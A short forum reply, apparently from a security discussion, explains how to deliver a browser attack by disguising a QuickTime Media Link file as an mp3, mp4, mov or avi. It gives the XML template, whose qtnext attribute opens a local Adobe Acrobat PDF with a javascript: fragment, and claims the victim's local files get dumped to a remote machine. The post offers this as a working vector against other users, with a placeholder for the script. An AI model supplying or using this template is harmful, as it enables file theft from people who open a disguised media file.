birdie Wrote:
-------------------------------------------------------
> How is this useful, because we can't include the
> url in an iframe, because then FF throws a
> security error. So how would one use this attack
> vector against anyone? Is it only possible to
> exploit by giving people the url over msn, irc or
> email?
Create a QTL file with mp3, mp4, mov, avi extension. Put the following content inside:
<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/ENUtxt.pdf#something=javascript:your_code_here“/>
When the user visits the file, their local file system will be explored and dumped on a remote machine. It is a bit evil I know.
for more info:
[
www.gnucitizen.org]
[
www.gnucitizen.org]